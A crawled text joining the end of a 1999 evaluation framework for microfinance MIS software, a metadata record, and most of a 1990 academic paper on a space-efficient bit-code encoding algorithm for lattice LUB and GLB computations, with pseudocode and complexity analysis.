Good version control alleviates the problems of having different copies of the software running simultaneously. Usually versions are numbered in the format 1.0, 1.1, 1.1.1, 2.0, etc. New versions usually translate into upgrades to the different users of the software product. Since upgrades sometimes involve major changes to the program, it is important for the software developer to have a clear plan for implementing these updates. This plan is called an upgrade strategy. | | | • Source code maintenance | | | | | • Clear versioning of software (developer can tell immediately what versions of the software are currently in production and what functionality is supported by each version) | | | | | • Clear upgrade strategy (developer can explain how to move from one version to another and what the effort make such an update will be) | | | | | Rollout mechanisms used: | | | | | • “Big Bang”—completely stop the current (old) system and start new system at the same time (dangerous and not recommended but commonly attempted) | | | | | • Parallel—continue to run the current system and the new systems simultaneously for a certain period of time, in order to check the accuracy and performance of the new system | | CHAPTER EIGHT CATEGORY 6: TECHNICAL SPECIFICATIONS AND CORRECTNESS Description: Analyzes the programs and programming language of the software, the type of network and hardware it is designed to work on, and the implications of these for future performance. In addition, the overall performance of the system in terms of speed and storage requirements should be assessed. In addition, it should be determined how well the system handles large numbers (typically, currency amounts) and dates (i.e., the year 2000). Topics: Technology and Architecture; Performance; Number and Date Handling <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | Technology and Architecture | When analyzing computerized systems, an important facet is the technological platform upon which they are implemented. The platform consists of a set of technologies put together in a systematic or architectural way. This topic refers to the type of hardware and software used to create, execute, and maintain the system. The infrastructure and environment of the organization should drive technology and the technical architecture, both now and in the future. | Have the following system areas been appropriately applied to the local technical environment: - Architecture (networked vs. stand-alone; client/server; etc.) - Database (Dbase, Oracle, Paradox, etc.) - Hardware (PC, Macintosh, Unix, etc.) - Minimum hardware configuration - Operating system (DOS, Windows 3.x, Windows 95, Windows NT, UNIX, Macintosh) - Network (Novell, Banyan, TCP/IP, etc.) - Development methodology (none, traditional, object-oriented, etc.) - Programming language (Clipper, FoxPro, Delphi, COBOL, C/C++, Java, etc.) - Infrastructure (electricity, telephone, etc.) - Source code control (none, PVCS, source safe, etc.) - Client/member-centric vs. loan/product-centric | | | Performance | This topic determines how fast the software system executes any given task and how efficiently it stores and maintains its data. Whenever possible use a standard hardware configuration to test the system (not just for performance). Suggested configuration is: Pentium 133 or better and 16 megabytes of RAM or more. | Speed: - User interface (how fast is client data displayed, how quickly are long lists shown to the screen, etc.) - Report generation (how fast are weekly, daily, and yearly reports generated) - Multiple users (does the system slow down with more than one user, at what point does speed start to degrade, etc.) - Significant performance degradation as the size of the database grows Storage: - Empty system (how much data space does the software require after initial installation, i.e. before entry of any client data?) - Client data (how much space is required per client?) - Product data (how much space is required per | | <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | Number and Date Handling | This topic refers to all number or date related problems, of which the best known is the Year 2000 problem. Additional problems include the ability to handle large numbers (for inflated currencies) and year problems (1999, 2000, and 2001). | ▪ Year 1999, 2000, 2001 ▪ Large numbers (>16 digits) | | | CHAPTER NINE CATEGORY 7: COST Description: Considers all costs associated with purchasing, installing, and operating the system. Cost information should include the base price of the software (as well as an assessment of the pricing structure), maintenance agreements, installation and training, conversion, upgrades, and maintenance releases. Topics: Pricing and Costs <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> <tbody> <tr> <td>Pricing and Costs</td> <td>A consideration of all costs associated with purchasing, installing, modifying, updating, and operating the system.</td> <td>- Base price and pricing structure (licensing policies, etc.)&lt;br&gt;- Customization and/or development costs&lt;br&gt;- Additional costs for computer and network hardware&lt;br&gt;- Additional costs for source code (where appropriate)&lt;br&gt;- Maintenance and technical support fees and charges&lt;br&gt;- Administrative costs (internal support)&lt;br&gt;- Installation and training costs&lt;br&gt;- Documentation costs&lt;br&gt;- Conversion costs (moving from an old to a new system)&lt;br&gt;- Costs of future upgrades and new releases&lt;br&gt;- Overall costs per user and costs per information system staff&lt;br&gt;- Price appropriate to level/complexity of functionality&lt;br&gt;- Overall value proposition (functionality as a function of cost)</td> <td></td> </tr> </tbody> </table> ANNEX A RATING SCORE SHEET ## Functionality and Expandability <table> <thead> <tr> <th>Weight</th> <th>Rating</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> </tr> </tbody> </table> - Functional completeness, appropriateness, and integration - Accounting package - Portfolio tracking - Deposit monitoring - Customer information system - Expandability and institutional growth - Flexibility - Customer-centric vs. account-centric - Institutional types - Lending methodologies - Loan interest types - Savings and deposit account types - Deposit interest types - Payment types - Payment frequencies - Multiple branches or regions - Multiple languages - Multiple currencies ## Usability - Ease of use and user-friendliness - User interface ## Reporting - Reports - Report generation ## Standards and Compliance - Accounting soundness and standards - Governmental and supervisory adherence ## Administration and Support - Security - Backup and recovery - Fault tolerance and robustness - End-of-period processing - Support infrastructure and maintenance - Version control and upgrade strategy ## Technical Specifications and Correctness - Technology and architecture - Performance - Number and date handling ## Cost - Pricing and costs
{"Source-Url": "http://www.bwtp.org/arcm/mfdm/Web%20Resources/Advanced%20MF%20Resources/Evaluation%20framework%20MIS%20for%20MF%201999%20(MBP).pdf", "len_cl100k_base": 13163, "olmocr-version": "0.1.46", "pdf-total-pages": 39, "total-fallback-pages": 0, "total-input-tokens": 73091, "total-output-tokens": 13754, "length": "2e13", "weborganizer": {"__label__adult": 0.0007214546203613281, "__label__art_design": 0.0012025833129882812, "__label__crime_law": 0.0009889602661132812, "__label__education_jobs": 0.0089263916015625, "__label__entertainment": 0.0002796649932861328, "__label__fashion_beauty": 0.0003788471221923828, "__label__finance_business": 0.07366943359375, "__label__food_dining": 0.0006589889526367188, "__label__games": 0.0023651123046875, "__label__hardware": 0.0025615692138671875, "__label__health": 0.0005307197570800781, "__label__history": 0.0003490447998046875, "__label__home_hobbies": 0.0003535747528076172, "__label__industrial": 0.0010042190551757812, "__label__literature": 0.0005764961242675781, "__label__politics": 0.0004832744598388672, "__label__religion": 0.0005574226379394531, "__label__science_tech": 0.0084381103515625, "__label__social_life": 0.0001881122589111328, "__label__software": 0.052154541015625, "__label__software_dev": 0.841796875, "__label__sports_fitness": 0.0004973411560058594, "__label__transportation": 0.0009107589721679688, "__label__travel": 0.00037384033203125}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 70453, 0.00292]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 70453, 0.2169]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 70453, 0.87532]], "google_gemma-3-12b-it_contains_pii": [[0, 73, false], [73, 519, null], [519, 1552, null], [1552, 2372, null], [2372, 3835, null], [3835, 3835, null], [3835, 6128, null], [6128, 9055, null], [9055, 12061, null], [12061, 14820, null], [14820, 19954, null], [19954, 22693, null], [22693, 24397, null], [24397, 26369, null], [26369, 28497, null], [28497, 30680, null], [30680, 33004, null], [33004, 34636, null], [34636, 36375, null], [36375, 38626, null], [38626, 41083, null], [41083, 42418, null], [42418, 45582, null], [45582, 46322, null], [46322, 47999, null], [47999, 48803, null], [48803, 49545, null], [49545, 51507, null], [51507, 53264, null], [53264, 56501, null], [56501, 59714, null], [59714, 61943, null], [61943, 62534, null], [62534, 65904, null], [65904, 67605, null], [67605, 67977, null], [67977, 69239, null], [69239, 69266, null], [69266, 70453, null]], "google_gemma-3-12b-it_is_public_document": [[0, 73, true], [73, 519, null], [519, 1552, null], [1552, 2372, null], [2372, 3835, null], [3835, 3835, null], [3835, 6128, null], [6128, 9055, null], [9055, 12061, null], [12061, 14820, null], [14820, 19954, null], [19954, 22693, null], [22693, 24397, null], [24397, 26369, null], [26369, 28497, null], [28497, 30680, null], [30680, 33004, null], [33004, 34636, null], [34636, 36375, null], [36375, 38626, null], [38626, 41083, null], [41083, 42418, null], [42418, 45582, null], [45582, 46322, null], [46322, 47999, null], [47999, 48803, null], [48803, 49545, null], [49545, 51507, null], [51507, 53264, null], [53264, 56501, null], [56501, 59714, null], [59714, 61943, null], [61943, 62534, null], [62534, 65904, null], [65904, 67605, null], [67605, 67977, null], [67977, 69239, null], [69239, 69266, null], [69266, 70453, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 70453, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 70453, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 70453, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 70453, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 70453, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 70453, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 70453, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 70453, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 70453, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 70453, null]], "pdf_page_numbers": [[0, 73, 1], [73, 519, 2], [519, 1552, 3], [1552, 2372, 4], [2372, 3835, 5], [3835, 3835, 6], [3835, 6128, 7], [6128, 9055, 8], [9055, 12061, 9], [12061, 14820, 10], [14820, 19954, 11], [19954, 22693, 12], [22693, 24397, 13], [24397, 26369, 14], [26369, 28497, 15], [28497, 30680, 16], [30680, 33004, 17], [33004, 34636, 18], [34636, 36375, 19], [36375, 38626, 20], [38626, 41083, 21], [41083, 42418, 22], [42418, 45582, 23], [45582, 46322, 24], [46322, 47999, 25], [47999, 48803, 26], [48803, 49545, 27], [49545, 51507, 28], [51507, 53264, 29], [53264, 56501, 30], [56501, 59714, 31], [59714, 61943, 32], [61943, 62534, 33], [62534, 65904, 34], [65904, 67605, 35], [67605, 67977, 36], [67977, 69239, 37], [69239, 69266, 38], [69266, 70453, 39]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 70453, 0.24035]]}
olmocr_science_pdfs
2024-11-23
2024-11-23
f873e723847128ec2fdb20d00464c214dbe16108
A Space and Time Efficient Coding Algorithm for Lattice Computations Deb Dutta Ganguly Sanjay Ranka Syracuse University A Space and Time Efficient Coding Algorithm for Lattice Computations Dutta Ganguly and Sanjay Ranka October 1990 School of Computer and Information Science Syracuse University Suite 4-116 Center for Science and Technology Syracuse, NY 13244-4100 (315) 443-2368 A Space and Time Efficient Coding Algorithm for Lattice Computations Deb Dutta Ganguly and Sanjay Ranka 4-116 CST, School of CIS Syracuse University Syracuse, NY 13210 ranka@top.cis.syr.edu (315)-443-4457 October 30, 1990 Abstract This paper presents an encoding algorithm to enable fast computation of the least upper bound (LUB) and greatest lower bound (GLB) of a partially ordered set. The algorithm presented reduces the LUB computation to an OR operation on the codes. The GLB computation is reduced essentially to an AND operation on the codes. The time complexity of our encoding algorithm is $O(n + e)$ where $n$ is the number of nodes and $e$ is the number of edges. With respect to space requirements the algorithm presented gives good results for small lattices (code length was 50 bits for a 300 node lattice), but it gives truly remarkable results for larger lattices (e.g. for a 950 node lattice it used 110 bits). Keywords and Phrases class inheritance, GLB, LUB, lattice, poset. List of Figures Figure 1: A lattice Figure 2: Adjacency Matrix Figure 3: Transitive Closure Matrix Figure 4: Codes after Pass 1 Figure 5: Codes after Pass 2 Figure 6: Codes after Pass 1 Figure 7: Codes after Pass 2 Figure 8: Algorithm Encode Figure 9: Pass 1 Figure 10: procedure name_children Figure 11: procedure max_pure_siblings Figure 12: procedure compute_prefix_len Figure 13: Pass 2 Figure 14: procedure glb_info Figure 15: Number of nodes vs. Avg. code length Figure 16: Number of nodes vs. Avg. computation time 1 Introduction Lattice operations are used to determine object properties by conjunction, disjunction, or exclusion of certain class properties. In [1] Hassan Aït-Kaci et al. discuss the applications of lattice computations in languages that support (multiple) inheritance in partially ordered classes. [2] presents an overview of the research in partially ordered data types: semantic networks, the first order approach, the initial algebra approach and the denotational approach. Kifer and Subrahmanian [3] have developed a theoretical foundation for multivalued logic programming. They present a procedure for processing queries to such programs and show that if certain constraints (over lattices) associated with such queries are solvable, then their proof procedure is effectively implementable. Thus, an engine for solving such constraints over lattices is critical to the practical implementation of generalized annotated logic programming of [3]. An important contribution of the Kifer-Subrahmanian work is that they show that their generalized annotated logic programming formalism is applicable to various important issues relating to expert systems. In particular, uncertainty of various different kinds (e.g. bilattices, Bayesian uncertainty propagation) can be handled in their framework. Additionally, their framework can be used to reason about databases that contain inconsistencies. As inconsistencies can easily arise in knowledge based systems (due either to errors in the data, or due to genuine differences of opinions amongst multiple experts), it is vital that databases behave well in the presence of such inconsistencies. Furthermore, Kifer and Subrahmanian [3] demonstrate that their framework can also be used for temporal reasoning. However, the query processing procedure developed by them lacks an important component, viz. their procedure is completely contingent upon certain constraints being solvable. However, no such procedures are developed by Kifer and Subrahmanian [3]. We address this problem in this paper. The solution to this problem presented here would make the Kifer Subrahmanian procedure for processing queries implementable. We first define a few basic notions [4]. Definition 1: A binary relation \( \leq \) on a set \( P \) is called a partial ordering in \( P \) iff \( \leq \) is reflexive, antisymmetric and transitive. The ordered pair \( \langle P, \leq \rangle \) is called a partially ordered set or a poset. Definition 2: Let \( \langle P, \leq \rangle \) be a partially ordered set and let \( A \subseteq P \). Any element $x \in P$ is an upper bound for $A$, if for all $a \in A$, $a \leq x$. Similarly any element $x \in P$ is a lower bound on $A$ if for all $a \in A$, $x \leq a$. **Definition 3:** Let $\langle P, \leq \rangle$ be a partially ordered set and let $A \subseteq P$. An element $x \in P$ is a least upper bound for $A$ if $x$ is an upper bound for $A$ and $x \leq y$ for every upper bound $y$ for $A$. Similarly, the greatest lower bound for $A$ is an element $x \in P$ such that $x$ is a lower bound and $y \leq x$ for all lower bounds $y$. A least upper bound if it exists is unique and the same is true for a greatest lower bound. The least upper bound is abbreviated as “LUB” and the greatest lower bound is abbreviated as “GLB”. **Definition 4:** A lattice is a partially ordered set $\langle L, \leq \rangle$ in which every pair of elements $a, b \in L$ has a greatest lower bound and a least upper bound. Lattices can be encoded by a brute-force approach using transitive closure (Section 2), such that the AND operation on two codes gives the LUB. This method uses $n$ bits to encode each node of a lattice with $n$ nodes. The total amount of space required is thus $\mathcal{O}(n^2)$. This may be prohibitive for large lattices. [1] presents an algorithm which uses “modulation” to reduce the code-length. Our algorithm is simpler and has $\mathcal{O}(n + e)$ time complexity. The LUB computations can still be completed by OR operations. The GLB computation is reduced to an AND operation on the codes followed by a simple step. The algorithm gives good results for small lattices (average code length was 50 for a 300 node lattice), but it gives truly remarkable results for larger lattices (e.g. for a 950 node lattice it used 110 bits for encoding). Section 3 describes a simple version of the algorithm when applied on a tree. Section 4 discusses the changes necessary to apply the same basic paradigm for poset encoding. Section 5 describes the algorithm and section 6 proves its correctness. Section 7 discusses the implementation. Section 8 concludes the paper. 2 Transitive Closure In this section we discuss the transitive closure technique for encoding lattices. Consider the lattice in Figure 1. Its adjacency matrix $A$ is shown in Figure 2. The edges are directed downwards. The adjacency matrix has a ‘1’ in the row headed by $x$ under the column headed by $y$ iff there is an edge from $x$ to $y$ in the lattice. Otherwise a position in the adjacency matrix has a ‘0’. A row headed by $x$ is a representation of the set of all the immediate lower bounds of $x$. Similarly a column headed by $y$ can be viewed as a representation of the set of all the immediate upper bounds of $y$. Since we are interested in LUB here, we will take the latter view. Next the transitive closure $A^*$ of $A$ is calculated by matrix multiplication. This is given by: $$A^* = \bigcup_{i=0}^{n} A^i$$ This computation converges in $O(\log_2 n)$ matrix multiplications of $n \times n$ boolean matrices. First $A^1 = I \cup A$ is calculated, from this $A^2$ and so on till two consecutive matrices are the same. $A^*$ is shown in Figure 3. Clearly the 1's in the column headed by $y$ indicate the upper bounds of $y$. Now an AND operation on two columns will yield the set of the common upper bounds. For example AND of the columns under 'b' and 'c' gives $[00000101]^T$ which is the code under the column headed by node 'f' the common upper bound and the LUB. Note that in a lattice it is possible for two nodes to have more than one LUB. In that case the AND of the codes will yield a code which represents the set of all common upper bounds. This method uses $n$ bits to encode each node of a lattice with $n$ nodes. The total amount of space required is thus $O(n^2)$ bits. This may be prohibitively high for large lattices. 3 Tree Encoding In this section we will discuss a coding algorithm for a tree which forms the basis of our lattice encoding algorithm. The algorithm works in two passes. In Pass 1, the lattice is swept layer$^1$ by layer from layer 0, the bottommost --- $^1$the word layer has been used for trees here (as opposed to the usual 'level') and lattices in subsequent sections to maintain consistency. layer of minimal elements, to the topmost layer of maximal elements. At each layer the nodes are encoded such that the sibling nodes get distinct codes. In Pass 2, the lattice is swept from the top to down. Now the non-sibling nodes are distinguished by prefixing them with their respective parent's codes. The bitwise-OR of any two codes yields the code of the LUB. In Pass 1 if there are \( n \) nodes with a common parent then an \( n \) bit code of the form \( 2^i, 0 \leq i \leq n - 1 \) is used i.e., '1' at the \( i \)th position and '0's at all other positions. Thus, at layer 0 the children of the same parent are assigned distinct codes. Then at every subsequent layer for each node such a code is prefixed to the bit-wise OR of the children's codes. For instance, the bitwise OR of node a's code (01) and node b's code (10) is 11, to which 01 is prefixed yielding node i's code (0111) in the left most subtree in Figure 4. The prefixing ensures that we can distinguish the codes of siblings. In Pass 1 the nodes with the same parent are assigned distinct codes but the nodes with different parents may still have identical codes. Pass 2 makes them distinct. Figure 4 illustrates the result of applying Pass 1 to the binary tree shown. Pass 2 starts at layer \( n-2 \), where layer \( n \) is the topmost (maximal) layer. It prefixes the existing codes to yield the final codes. Let \( d = \text{length(parent.code)} - \text{length(current.code)} \). Each code is prefixed by the leftmost \( d \) bits of its parent. Thus yielding the codes in the Figure 5. **Example:** Consider the nodes a and d in Figure 5. The bitwise OR of their codes is 011111, which is the code of m, the LUB of nodes a and d. Our encoding algorithm ensures that the LUB of two nodes has a '1' at all the positions at which the bitwise OR of the codes of the two nodes has a 1 and may be a few more. Now consider the nodes a and b in Figure 5. The bitwise OR of their codes is 011101. Nodes i, m, o subsume this code, of these node i is at the lowest layer hence it is the LUB. ### 3.1 Analysis of Tree Encoding For a tree with a constant branching factor \( b \) the above algorithm will use \( b \) bits at each layer. If the tree has \( l \) layers then \( b \times l \) bits would be required for encoding each node of the tree. Thus when \( b = 2 \) the entire tree uses \( 2 \times l \) bits. If the tree has \( n \) nodes then in terms of the \( n \) only \( 2 \times \log_2 n \) bits are used. The entire tree would use \( 2n \times \log_2 n \) bits compared to \( n^2 \) bits used by the Transitive Closure method. The algorithm works well for a Figure 4: Codes after Pass 1 Figure 5: Codes after Pass 2 tree, but cannot be directly used on a lattice. The main difference between a lattice and a tree, in the context of this algorithm, is that every node in a tree has an indegree\(^2\) of one (pure nodes) whereas in a lattice some nodes can have an indegree greater than one (impure nodes). This necessitates a few modifications to the above algorithm. We discuss the basic modification in the next section. 4 Lattice Encoding In this section we discuss the basic modification required for applying the above paradigm to a lattice. We observed that the problem arises because of the impure nodes. To overcome this problem we assign distinct prefixes to the impure nodes in Pass 1 which are not used again. Pass 1 starts at layer 1 and first the prefix length of the current layer is calculated. This is the sum of the number of impure nodes and the maximum number of pure sibling nodes\(^3\) (e.g. in Figure 6 at layer 1 there is one node \(c\) which is impure and nodes \(d\) and \(e\) form the largest set of pure sibling nodes. Hence the prefix length at this layer is 3). Next the impure nodes are assigned distinct prefixes of the form \(2^i\), (i.e., a '1' in the \(i^{th}\) bit position) which are not used again (e.g. in Figure 6 node \(c\) gets the prefix 100). This gives a unique identity to the node (lemma 1) since only ancestors and descendants of this node can now have a 1 at the \(i^{th}\) position. While coding the pure nodes we follow the same strategy as for a tree (e.g. in Figure 6 at layer 1 node \(c\) is assigned the code 100 which is not used again). After this at the next layer each node gets the bitwise OR of its children codes. Then each code is prefixed similarly. The process continues for every subsequent layer until we reach the topmost layer. Consider the lattice in Figure 1. Figure 6 illustrates the result of applying Pass 1 of the modified algorithm to the lattice in Figure 1. In Pass 2 we prefix the codes of a pure nodes with the leftmost \(d\) bits of its parent, where \(d = \text{length(parent.code)} - \text{length(child.code)}\). The code of an impure node is prefixed by \(d\) 0’s so that its code length remains same as that of the other nodes. Thus we get the codes in Figure 7. The part of the \(^2\)the number of parents of a node \(^3\)We note that in most cases in practice the number of nodes with indegree greater than 1 is few. Figure 6: Codes after Pass 1 Our encoding algorithm ensures that the LUB of two nodes has a '1' at all the positions at which the bitwise OR of the codes of the two nodes has a 1 and may be a few more. We say that the LUB subsumes the bitwise OR of the codes. **Definition 5:** \( b \text{.code subsumes } a \text{.code iff} \) \[ \forall i((2^i \& a \text{.code}) = 2^i \implies (2^i \& b \text{.code}) = 2^i) \] ; where \& denotes the bitwise AND operation **Example:** Consider the nodes \( c \) and \( e \) in Figure 7, the bitwise OR of their codes is 01101, but there is no node with such a code. So we look for a node whose code subsumes this code. Nodes \( g \) and \( h \) both subsume 01101, since they are both upper bounds of nodes \( c \) and \( e \). Of these node \( g \) is the Algorithm $\text{Encode}(L : \text{lattice})$ $\text{Form.Layers}(L : \text{lattice});$ $\text{Pass1}(L : \text{lattice});$ $\text{Pass2}(L : \text{lattice});$ Figure 8: Algorithm Encode LUB since it is at a lower layer. After encoding the codes may be stored in an array sorted lexically by the codes. A linear search on this array for the LUB code will take $O(n)$ time. Alternatively the codes may be stored in a data structure which is the same as the original lattice. Suppose lub.code is the bitwise-OR of the codes whose LUB we are computing. We start at the maximal node and move to the child which subsumes lub.code. We keep moving similarly until we get a node whose children do not subsume lub.code. This node is the LUB. This operation would take $O(h)$ time where $h$ is the height of the lattice. These modifications and a few more yield the algorithm in the following section. 5 Algorithm Encode This section the procedures invoked by Algorithm Encode (figure 8) in detail. $\text{Form.Layers}$ divides the lattice into layers. The layering is done using a depth first search starting at the minimal node and going upwards. A layer is a set of incomparable nodes - a cochain, computed as the set of all the immediate parents that cannot be reached later. $\text{Algorithm Encode}$ next executes Pass1 and Pass2. We now describe them in detail. In a lattice it is possible that some, but not all, of the children of the node reside in layers below the one immediately below the node’s layer. However the proof of correctness of the algorithm is simplified by the notion that there exists a continuous path (i.e., a path that does not jump across layers) between each ancestor-descendant pair. If an edge jumps across layers we int : curr_code_len, unik[max_noof_layers] /* The $i^{th}$ element of the array unik[max_noof_layers] stores the bit-position from which the pure nodes in the $i^{th}$ layer are assigned codes */ procedure Pass1(L : lattice) 1. int layer_no, i, d, prefix, virtual_code node n, m global int : curr_code_len, unik[max_noof_layers] 2. curr_code_len ← 0 3. For layer_no ← 1 to max_layer do 4. For each node $n$, in the layer numbered layer_no do /* get the bitwise OR of all the children codes */ 5. n.code ← zero(curr_code_len) /* initialize n.code to curr_code_len long string of 0's */ 6. For each node $c \in children(n)$ do 7. n.code ← n.code OR c.code 8. endfor 9. If outdegree($n$) = 1 then 10. If indegree(child($n$)) = 1 then 11. $i$ ← left_most_1(child($n$)) /* bit position of the left most 1 in child's code */ 12. n.code ← $2^{i-1}$ OR child($n$).code 13. endif 14. endif 15. endfor 16. If layer_no ≠ max_layer do 17. curr_code_len ← curr_code_len + compute_prefix_len(layer_no) 18. $i$ ← curr_code_len /* the bit position from which coding will start at this layer; first encode the impure nodes */ 19. For each node, $n$, in the layer numbered layer_no, do 20. If indegree($n$) > 1 then 21. n.code ← $2^i$ OR n.code 22. n.code_len ← curr_code_len 23. $i$ ← $i - 1$ 24. endif 25. endfor /* impure nodes encoding finished */ 26. unik[layer_no] ← $i$ /* the bit position from which the pure nodes in the layer numbered layer_no are assigned codes */ 27. For each node, $m$, in the layer numbered layer_no + 1 do 28. name_children($m$, layer_no) 29. endfor 30. endif 31.endfor Figure 9: Pass1 will assume that virtual nodes are inserted in each intermediate layer along the edge from the child to the parent. Each of these virtual nodes can be seen as having the code of the child. This notion will only be required to prove correctness of the algorithm. In Pass1 the algorithm starts at layer 1 (the minimal node resides in layer 0) and proceeds to the topmost layer, i.e., the layer in which the maximal node exists. Procedure zero(i) returns a bit pattern of i 0's used to initialize the code. Every node in the current layer first gets the bit-wise OR of the codes of the children (lines 6-8 in Figure 9). Note that if the outdegree of a node is one and the indegree of its only child is also one then the algorithm of the previous section will assign identical codes to these two nodes. Lines 9 to 14 in Figure 9 take care of this contingency. The call to left_most_1(child(n)) returns the bit position at which a '1' was introduced when child(n) was encoded which is the left most 1 in its code let this be i. Now line 17 introduces a 1 at position i - 1 in n.code. This amounts to inserting a virtual child of n (see below a description of the manner in which sibling nodes are prefixed by name_children). The rest of Pass1 (lines 16-30 in Figure 9) is performed for all the layers except the topmost layer. First the length of the prefix to be attached is calculated by compute_prefix_len and curr_code_len is incremented (lines 17-18 in Figure 9). We will discuss the procedure compute_prefix_len after discussing Pass1). Next (lines 16-19 in Figure 9) the nodes with outdegree greater than one are taken and each one is given a distinct prefix. This ensures that a 1 at this bit position can be introduced only by this node (see Lemma 1). When all such nodes have been prefixed the bit-position from which the prefixing of the pure nodes can start is stored in the array unik (line 31 in Figure 9). Thus the prefixes greater than $2^{unik[layer-no]}$ are used to uniquely prefix nodes with indegree greater than one. The prefixes less than or equal to $2^{unik[layer-no]}$ are used to prefix the nodes with indegree equal to one. Now (lines 27-29 in Figure 9) the nodes at the next higher layer are taken one after another (note that each such node has at least one child in current_layer) and their children are prefixed, or named, by name_children. This procedure gives distinct prefixes to the codes of the children of parent that are not yet prefixed, i.e., the nodes with indegree equal to one. The idea is to make \^the nodes in the lower layers to which a node is connected procedure name_children(parent : node, layer : int) int j global int curr_code_len, unik[max_noof_layers] node n If parent.layer_no ≠ layer + 1 then return j ← unik[layer] For each node n ∈ children(parent) do If indegree(n) = 1 then n.code ← 2̅j OR n.code n.code_len ← curr_code_len j ← j - 1 Figure 10: procedure name_children the sibling codes distinct. Note that the parent node is in layer_no + 1; thus some, but not all of its children may be at deeper layers than layer_no. Thus this procedure can be invoked by a child at the deeper layer. We wish to start encoding the siblings when the sibling at the highest layer calls name_children. Hence the check at the first line of the procedure. Now we are in a position to discuss the computation of prefix length in Pass1. This task is carried out by the procedure compute_prefix_len. It uses the procedure max_pure_siblings, which we will discuss first. The children with indegree equal to one are called pure children. Procedure noof_pure_children(n : node) returns the number of pure children of a node n. Procedure max_pure_children uses this procedure to compute the cardinality of the largest set of pure sibling nodes at the given layer. Procedure compute_prefix_len first initializes len to the number of nodes with indegree greater than one in the layer (noof_indgr_gt_1). Next the maximum number of pure sibling nodes are determined. This will turn out to be one if there is only one pure node in the layer. Thus name_children would prefix the pure node with a 1 in the right most bit position allowed in this layer, say i. Now if the pure node's parent has outdegree one then, while procedure max_pure_siblings(j : layer) int noof_siblings node m noof_siblings ← 0 For each node, m, in layer j + 1 do If noof_pure_children(m) > noof_siblings then noof_siblings ← noof_pure_children(m) return(noof_siblings) Figure 11: procedure max_pure_siblings encoding the parent Algorithm Encode would (lines 9-14 in Figure 9) try to place a 1 at bit position i − 1. Placing a 1 at this bit position may incorrectly relate the parent node to a node at layer no − 1. Hence a check is made to see if max_pure_siblings indeed returns 1. If it does then a check is be made to see if the parent has outdegree 1. If it does then len in incremented by 2 otherwise it is incremented by the value returned by man_pure_siblings. Pass2 is extremely simple. It starts at the layer just below the topmost layer and goes down to the bottom most layer. For each node the d(ifference) between the parent’s code length and the node’s code length is calculated. If the indegree of the node is greater than one then the code is prefixed by d zeroes (zero(i : int) returns a string of i zeroes) otherwise the code is prefixed by the first d bits of the parent (first(d, q) returns the leftmost d bits of q.code). This completes the discussion of Algorithm Encode. In the next section we analyze its time complexity. 5.1 Analysis of Algorithm Encode Let n be the total number of nodes in the lattice. Let ni denote the number of nodes in layer i. Further let e be the total number of edges in the lattice and ei be the number of edges originating from the nodes in layer i. Note that \( \sum_i n_i = n \) and \( \sum_i e_i = e \). We will assume that the nodes are stored in procedure compute_prefix_len(i : layer) int len len ← noof_indgr_gt_1(i) /* each impure node must be prefixed uniquely */ If (max_pure_siblings(i) = 1) then /* only 1 pure node say n in layer i */ If outdegree(parent(n)) = 1 then len ← len + 2 else len ← len + 1 else len ← len + max_pure_siblings(i) return(len) Figure 12: procedure compute_prefix_len procedure Pass2(L: lattice) For layer_no ← max_layer − 1 downto 0 do For each node, n, in layer_no do d ← parent.code_len − n.code_len If indegree(n) > 1 then prefix ← zero(d) else prefix ← first(d, parent.code) n.code ← concatenate(prefix, n.code) Figure 13: Pass2 an array sorted according to layers. The ordering inside a particular layer does not matter. This ordering can be performed in $O(n + e)$ time from a graph represented using adjacency lists. We will first analyze Pass1. Consider the steps performed by Pass1 at layer $i$. First each node gets the bitwise-OR of all its children codes (lines 4 to 15 in Figure 9). This involves exactly $e_i$ steps. After this compute_prefix_len is called (line 17 in Figure 9). Procedure compute_prefix_len (Figure 12) first determines the number of impure nodes in layer $i$. This takes one run through the layer and thus takes $O(n_i)$ time. It then calls max_pure_siblings. Procedure max_pure_siblings (Figure 11) checks every node which is a child of a node in layer $i + 1$. This takes $O(e_{i+1})$ time. Thus compute_prefix_len takes $O(n_i + e_{i+1})$ in layer $i$. Next in Pass1 (lines 19 to 25) the impure nodes are encoded. This takes one run through the layer and thus takes $O(n_i)$. After this (lines 27 to 29) each node in layer $i + 1$ is taken and procedure name_children is called each time. Procedure name_children (Figure 10) works on all the children of the argument node. Thus in lines 27 to 29 all the children of the nodes in layer $i$ are encountered, this takes $O(e_{i+1})$ time. Thus Pass1 takes $e_i + O(n_i + e_{i+1}) + O(n_i) + O(e_{i+1})$ time. This simplifies to $O(n_i + e_{i+1})$ time for each layer $i$. Summing over all layers we get the time complexity of Pass1 to be $O(n + e)$. In Pass2 every node is visited exactly once so it takes $\Theta(n)$ time. Thus the time complexity of Algorithm Encode is $O(n + e)$. For sparse lattices, $e = O(n)$. Thus the algorithm is linear in the number of nodes. The experimental results (Figure 16) tally with this analytical result. This concludes the analysis of Algorithm 